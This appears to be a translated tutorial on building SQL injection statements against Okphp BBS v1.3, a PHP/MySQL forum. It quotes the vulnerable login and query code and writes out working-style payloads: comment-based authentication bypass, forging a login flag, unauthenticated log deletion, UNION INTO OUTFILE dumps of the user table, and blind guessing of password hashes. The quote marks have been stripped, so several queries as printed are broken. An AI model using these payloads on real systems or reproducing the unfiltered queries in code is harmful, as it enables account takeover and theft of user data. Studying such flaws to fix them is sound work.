1. Foreword:
Version information: Okphp BBS v1.3 open source version
Due to PHP and MYSQL itself, the injection of PHP+MYSQL is more difficult than asp, especially the construction of statements during injection. This article is mainly based on a simple analysis of some files of Okphp BBS v1.3. Let’s talk about the construction method of php+mysql injection statement. I hope this article will be helpful to you.
Statement: All the "vulnerabilities" mentioned in the article have not been tested and may not exist at all. In fact, it does not matter whether there are loopholes. What is important is the analysis ideas and statement structure.
2. "Vulnerability" analysis:
1.admin/login.php injection leads to authentication bypass vulnerability:
Code:
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username=$username and password=$password";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username=$username and password=$password"
$username and $password are not filtered and can be easily bypassed. (bkJia Chinese website)
Methods for modifying statements such as select * from $user_table where username=$username and password=$password are:
Construction 1 (using logical operations): $username= OR a=a $password= OR a=a
Equivalent to sql statement:
Select * from $user_table where username= OR a=a and password= OR a=a
Construction 2 (use the comment statement # in mysql, /* to comment out $password): $username=admin# (or admin/*)
That is:
Select * from $user_table where username=admin# and password=$password"
Equivalent to:
select * from $user_table where username=admin
The $password in the $q statement in admin/login.php is md5 encrypted before querying, so it cannot be bypassed by the statement in construct 1. Here we use construction 2:
select id,group_id from $user_table where username=admin# and password=$password"
Equivalent to:
Select id,group_id from $user_table where username=admin
This is true as long as there is a user named admin. If you don’t know the user name, you only know the corresponding id,
We can construct it like this: $username= OR id=1#
Equivalent to:
Select id,group_id from $user_table where username= OR id=1# and password=$password (the ones after # are commented out)
Let’s look at the code below:
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
// Fail to login---------------
if (!$login) {
write_log("Moderator login","0","password wrong");
echo "";
exit();
}
// Access ! -------------
else {
session_start();
In the end, it is simply judged by a $login. We only need to submit $login=1 directly through IE to bypass it :).
2.users/login.php injection leads to authentication bypass vulnerability:
Code:
$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username=$username and password=$md5password";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$username is not filtered, use the same comment as 1 and password=$md5password";
3.adminloglist.php has a vulnerability of arbitrary deletion of log records. (ps: This seems to have nothing to do with php+mysql injection, just mention it casually) (bkJia Chinese website)
The backend of okphp seems to be written very sloppily. All files are not checked whether the administrator has logged in, so that they can be accessed at will. Let’s look at the code of list.php:
$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
Omit...
if ($log_id) {
foreach ($log_id as $val) {
$q = "delete from $log_table where id=$val";
$res = sql_query($q,$conn);
if ($res) {
$i++;
}
}
}
elseif ($del_id) {
$q = "delete from $log_table where id=$del_id";
$res = sql_query($q,$conn);
}
$tpl->setVariable("message","$i log deleted ok!");
$tpl->setVariable("action","index.php?action=list_log");
}
The code simply uses get_r($arr); to determine the submitted parameters, we only need to submit the corresponding $del_log, $log_id, $del_id. The deletion will be successful.
4. Multiple files do not filter variables, leading to SQL injection vulnerabilities.
The authors of okphp don’t seem to like filtering :). Basically all variables in SQL statements are "naked". I won’t list the specific files. Please read the code yourself. I will use forumslist_threads.php as an example to briefly talk about it.
Look at the code of list_threads.php:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=$forum_id";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
The variable $forum_id is not filtered because mysql does not support subqueries. We can use union construction statements to perform joint queries (requires MySQL version 4.00 or above) to achieve cross-database operations. We construct the following:
Construction 1: Use SELECT * FROM table INTO OUTFILE /path/file.txt (mysql is required to have file permissions, please note that the absolute path is required in the win system, such as: c://path//file.txt). Enter the queried content into file.txt, and then we can access the query results through http://ip/path/file.txt. Above we can construct $forum_id like this:
$forum_id= union select * from user_table into outfile /path/file.txt
Following:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=$forum_id union select * from user_table into outfile /path/file.txt "; (bkJia.com)
The above method is more demanding and must obtain the path of the web (usually it can be obtained by submitting wrong variables to cause mysql to report an error), and the magic_gpc=on option of PHP prevents single quotes from appearing in the injection. If magic_gpc=on we can also bypass:
Construction 2: Just like asp cross-database query, directly use union select to construct the statement, so that the returned results are different to guess the solution. This method can bypass the single quotes (magic_gpc=on) and continue the injection, but in PHP this This injection is relatively difficult, depending on the specific code. For specific statement construction, please refer to pinkeyes' article "php injection example". Below I will give an example of using "different return results" injection combined with okphp: (see vulnerability 5).
5.admin/login.php and users/login.php can be guessed to get the specified user password hash through the SQL statement construction: (Actually, this is the same as vulnerability 1 and 2. It is taken out separately here, mainly to explain the statement. Constructed method )
The problem code is the same as vulnerability 1.
Statement construction (ps: since the statement itself operates on the user library, there is no need to use union):
$username=admin AND LENGTH(password)=6#
The sql statement becomes:
$q = "select id,group_id from $user_table where username=admin AND LENGTH(password)=6# and password=$password"
Equivalent to:
$q = "select id,group_id from $user_table where username=admin AND LENGTH(password)=6"
If LENGTH(password)=6 is true, it will return normally. If it is not true, mysql will report an error.
In this way we can guess the user admin password hash. For example, $username=admin ord(substring(password,1,1))=57#
You can guess the ASCII code value of the first digit of the user’s password..............